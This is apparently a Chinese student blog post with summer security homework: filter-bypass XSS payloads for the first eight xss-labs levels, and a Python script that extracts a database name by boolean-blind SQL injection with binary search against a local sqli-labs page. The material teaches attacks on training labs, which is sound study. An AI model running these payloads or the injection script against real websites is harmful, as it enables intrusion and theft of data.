暑期作业2

原创 已于 2025-07-17 18:49:33 修改 · 155 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #javascript #html

于 2025-07-16 23:35:43 首次发布
部署运行你感兴趣的模型镜像

 一、xss-labs 前八关

第一关:

?name=<script>console.log("hah")</script>

第二关:

"><script>console.log("hah")</script>

        分析:将value 属性提前闭合value=""),将input也形成闭合,然后注入 <script> 标签。

        最终渲染的 HTML 会是: <input type="text" name="keyword" value=""><script>console.log("hah")</script>">

 第三关:

先看源码:

 分析:htmlspecialchars() 是 PHP 中的一个内置函数,用于将特殊字符转换为 HTML 实体。这里我们可以使用单引号对value提前闭合并利用onfocus事件绕过

默认转换的符号(ENT_QUOTES 未启用时):
& → 转换为 &amp;
" → 转换为 &quot;(仅当设置 ENT_COMPAT 标志时,默认行为)
' → 不转换(除非指定 ENT_QUOTES 或 ENT_SINGLE_QUOTES)
< → 转换为 &lt;
> → 转换为 &gt;

'onfocus='alert()'

 

 

第四关:

分析:'<' 和 '>'给删掉了,没多做过滤。这里是双引号闭合,<input>标签,所以我们还能继续利用onfocus事件,构建payload

 

"> onfocus="javascripe:alert()"
"> onfocus="alert()"

 第五关:

其实也要着急看源码,简单输入'aaaa'并在网页中按下 F12 键打开浏览器开发者工具观察一下,试一试几个常用的xss注入方式。这一关过滤了js的标签还有onfocus事件,虽然str_replace不区分大小写,但是有小写字母转化函数,所以就不能用大小写法来绕过过滤了,只能新找一个方法进行xss注入,这里我们用a href标签法。

"> <a href=javascript:alert()>xxx</a>

 我提醒一下:如果你写完发现没用,注意检查href是否拼错,是不是写成了herf

第六关:

"> <sCript>alert()</sCript> 

" Onfocus=javascript:alert() 

"> <a hRef=javascript:alert()>x</a>

 

 第七关:

输入 "> <script></Script>.发现有小写转化,并将script用空格替换了。

 

 输入"> <a hRef=javascript:alert()>x</a> 试试呢?

 

 查看源码不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过.

"> <a hrehreff=javasscriptcript:alert()>x</a> <"

"> <scrscriptipt>alert()</scscriptript>

 

 第八关:

可以发现,input标签添加了html实体转化函数还把双引号也给实体化了, 添加了小写转化函数,还有过滤掉了src、data、onfocus、href、script、"(双引号)

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

 字符 编码/解码 - 锤子在线工具

 

二、python实现自动化布尔盲注的代码进行优化(二分查找)

import requests

# 目标URL
url = "http://127.0.0.1/sqli-labs/Less-8/index.php"

# 字符集(按ASCII顺序排列)
charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz-."

def get_database_length():
    low = 1
    high = 50  # 假设最大长度为50
    
    while low <= high:
        mid = (low + high) // 2
        payload = f"1' AND (SELECT length(database()) > {mid}) -- "
        response = requests.get(url, params={"id": payload})
        
        if "You are in..........." in response.text:
            low = mid + 1
        else:
            payload = f"1' AND (SELECT length(database()) = {mid}) -- "
            response = requests.get(url, params={"id": payload})
            if "You are in..........." in response.text:
                return mid
            high = mid - 1
    return 0

def binary_search_char(position):
    low = 0
    high = len(charset) - 1
    
    while low <= high:
        mid = (low + high) // 2
        current_char = charset[mid]
        
        # 测试当前字符是否大于实际字符
        payload = f"1' AND (SELECT ascii(substring(database(), {position}, 1)) > ascii('{current_char}')) -- "
        response = requests.get(url, params={"id": payload})
        
        if "You are in..........." in response.text:
            low = mid + 1
        else:
            # 测试当前字符是否等于实际字符
            payload = f"1' AND (SELECT substring(database(), {position}, 1) = '{current_char}') -- "
            response = requests.get(url, params={"id": payload})
            if "You are in..........." in response.text:
                return current_char
            high = mid - 1
    return None

def get_database_name(length):
    db_name = ""
    for i in range(1, length + 1):
        char = binary_search_char(i)
        if char is None:
            print(f"Failed to determine character at position {i}")
            break
        db_name += char
        print(f"Found character {i}/{length}: {char} - Current name: {db_name}")
    return db_name

# 主函数
if __name__ == "__main__":
    print("Determining database length...")
    length = get_database_length()
    if length > 0:
        print(f"Database length: {length}")
        print("Determining database name...")
        db_name = get_database_name(length)
        print(f"Database name: {db_name}")
    else:
        print("Failed to determine database length.")

您可能感兴趣的与本文相关的镜像

Python3.11

Python3.11

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

ddacrp
关注
小学数学一年级暑假作业2(分类复习)精选.doc
09-26
《小学数学一年级暑假作业2(分类复习)精选.doc》这份文件,正是针对小学一年级学生在假期中继续深化数学基础的一个精心设计。其内容覆盖面广,从数的认识和基本运算,到数的比较、排列、组合,乃至货币单位换算,...
吉林省长春市高二数学暑期作业2 理(无答案) 试题.doc
11-12
吉林省长春市高二数学暑期作业2理(无答案)试题,作为对这一学年学习内容的梳理和检验,不仅涉及了高中数学的核心知识点,而且加深了学生对知识点的理解与应用。本文将对这份作业的内容进行深入分析,以帮助学生更好...
暑假作业2
lyx0228的博客
08-10 313
11 #include<stdio.h> float fish(float n) { if(n==5) return (11); else return ((n+1)/n)*(fish(n+1)+1/(n+1)); } main() { printf("%f",fish(1)); } 12 #include<stdio.h> void splitfloat(float x,int *intpart,float *fracpart) { *intpart=(int)x; fracpar
c语言暑假作业,暑假作业答案
weixin_33539912的博客
05-16 190
要是小朋友作业不会做,而自己也没有多少时间去教,这时候对照答案去教小朋友倒也是个不错的选择。以下就是小编为您整理的“2018一年级语文暑假作业答案”,希望对您能够有所帮助。2018一年级语文暑假作业答案1-2页一、略二、泻一泄 到一道 义一异 查一察 众一重 晦一诲三、我早就想把你抓住了,我早就想剿灭你了(意对即可)。四、1.⑴用出全部力量,一点儿也不保留。(2)形容思想感情自然而然地产生。2.D...
java暑假_Java暑期作业
weixin_39585617的博客
02-25 235
一、假期观影笔记--《熔炉》影片《熔炉》是根据发生在韩国光州聋哑学校里的真实事件而改编。影片讲述的是在一所聋哑儿童学校里,校长、教务以及老师披着慈善的华丽外衣对学校中的多名未成年聋哑学生施行性侵害以及各种虐待,直到新美术老师姜仁浩的到来才慢慢揭开这隐藏的丑恶现实。起初姜仁浩只是发现个别学生身上有大大小小的淤青,询问结果也只是自己打闹磕碰形成的,直到后来姜仁浩亲眼目睹同事、舍管肆意暴打虐待学生,才逐...
软件工程实践暑假作业
qq_73605598的博客
08-29 1998
2401软件工程暑假作业
暑假作业1
lyx0228的博客
08-10 2981
1, #include<stdio.h> even(int n) { if(n%2) return(1); else return(0); } main() { int n,sum=0; scanf("%d",&n); while(n) { if(even(n)) sum+=n; scanf("%d",&n); } printf("%d",sum); } 2. #include<stdio.h> #include<math.h> double dist(d
c语言暑假作业,暑假作业的答案
weixin_39919165的博客
05-16 322
2016年的暑假过去一半咯,同学们还记得有暑假作业这回事吗?下面有应届毕业生小编整理的暑假作业的.答案,欢迎借鉴!第2页欣喜若狂、满怀期待、浮想联翩衰落 蓑衣 瞻仰 屋檐 灵魂 瑰宝 沙漠 寂寞 延迟 诞生第3页(横着来)松鼠 大象 蜜蜂 兔子 犀牛 鸡第4页自告奋勇、救死扶伤、突发奇想、无伤大雅、微不足道他会想:虽然我快死了,但我不能违反这条标语,我一定要活下去!谣(歌谣)琶(琵琶)碎(摔碎)挺...
java暑假_Java暑假作业
weixin_33999969的博客
02-25 206
##一.《大护法》观影有感...![](https://imgsa.baidu.com/forum/w%3D580/sign=fcd46a0838adcbef01347e0e9cae2e0e/d62e5eafa40f4bfbd79bcd980a4f78f0f636185a.jpg)从预告开始就期待着这部影片,在看过一遍后又忍不住二刷,影片观看至第二遍后,对于全片的脉络也更清晰了一点,虽然打着暴力美...
c语言暑假作业,C暑假作业答案.doc
weixin_28389377的博客
05-16 388
C暑假作业答案C#暑假作业一、单项选择题1.属于C#语言的关键字( )。A. abstract B. camel C. Salary D. Employ答案:A2.C#语言中,值类型包括:基本值类型、结构类型和( )。A.小数类型 B.整数类型 C.类类型 D.枚举类型答案:D3. 假定一个10行20列的二维整型数组,下列哪个定义语句是正确的( )。A. in...
c语言小明加减法暑假作业,C语言暑假作业.doc
weixin_39851048的博客
05-16 201
C语言暑假作业第一单元 程序设计和C语言选择题C语言的基本构成单位是: 。A. 函数B. 函数和过程C. 超文本过程D. 子程序一个C语言程序总是从 开始执行。A. 主过程 B. 主函数 C. 子程序 D.主程序C语言的程序一行写不下时,可以 。A. 用逗号换行B. 用分号换行C. 在任意一空格处换行D. 用回车符换行以下叙述不正确的是...
2025 暑期作业
2301_81853998的博客
07-15 892
R2、R3、R4 配置 OSPF ,把各自互联网段、环回网段宣告进 OSPF 区域 0 ,R5 也配置 OSPF 并宣告 192.168.1.16/30、192.168.1.20/30 以及 5.5.5.0/24 网段(如果设备支持把环回宣告,也可规范宣告方式 ),这样借助 OSPF 动态路由,R1 - R4 无需写静态路由就能通过动态学习到 5.5.5.0/24 路由,同时减少静态路由条目,OSPF 自身有防环机制(基于 SPF 算法 )。# 配置 R1 环回接口(两个环回)# 配置 R1 接口 IP。
安徽省六安市舒城中学2016年高二化学暑假作业2.doc
09-12
以上就是针对安徽省六安市舒城中学2016年高二化学暑假作业2中的知识点详细解释。这些内容涵盖了烷烃、烯烃、炔烃的基本性质,化学反应类型,有机物的鉴别和提纯,以及化学反应方程式的书写等方面。
江苏省涟水中学2013年高二数学 暑假作业2 函数(1)
08-19
江苏省涟水中学2013年高二数学暑假作业2函数(1)涵盖了高中数学中的重要知识点,主要涉及函数的概念、性质以及应用。以下是这些题目所体现的关键知识点: 1. **函数的奇偶性**:题目中多次出现判断函数是否为奇...
安徽省六安市舒城中学2016年高二英语暑假作业2.doc
09-12
这篇文档是针对高二英语暑假作业的内容,涵盖了美文晨读、词汇训练和短文改错三个部分。这些练习旨在帮助学生巩固和提升英语能力,包括语言表达、词汇记忆和语法规则的理解。 美文晨读部分引用了一句谚语:“能攀登...
商城后台管理系统 02 添加规格参数-动态表单
weixin_52943021的博客
12-15 277
Boolean。
vue2/vue3前端创建脚手架并引入RBAC权限模型
最新发布
demotang的博客
12-18 107
本文介绍了基于Vue的RBAC权限管理系统实现方案。主要内容包括:1) 使用VueCLI创建项目并配置基础结构;2) 封装axios请求,实现请求/响应拦截;3) 通过Vuex管理角色和权限状态;4) 实现路由守卫和动态路由生成;5) 开发权限指令和按钮组件进行细粒度控制;6) 完整RBAC流程实现,包括登录认证、权限获取和访问控制。该方案覆盖了前端RBAC的核心功能,可根据项目需求灵活调整。
商城后台管理系统 03 规格参数配置
weixin_52943021的博客
12-15 225
【代码】商城后台管理系统 03 规格参数配置。
Harmony OS Web 组件:如何在新窗口中打开网页(实战分享)
Yihong1833100198的博客
12-17 867
摘要:本文分享了Harmony OS Web组件实现新窗口打开网页的实战经验。通过multiWindowAccess()设置允许新窗口,结合onWindowNew回调捕获并处理网页中的新窗口请求(如target="_blank"链接或window.open调用)。文章提供了典型应用场景(如区分内外链处理)、完整代码示例和常见问题解决方案,帮助开发者实现更智能的网页打开策略,提升应用体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值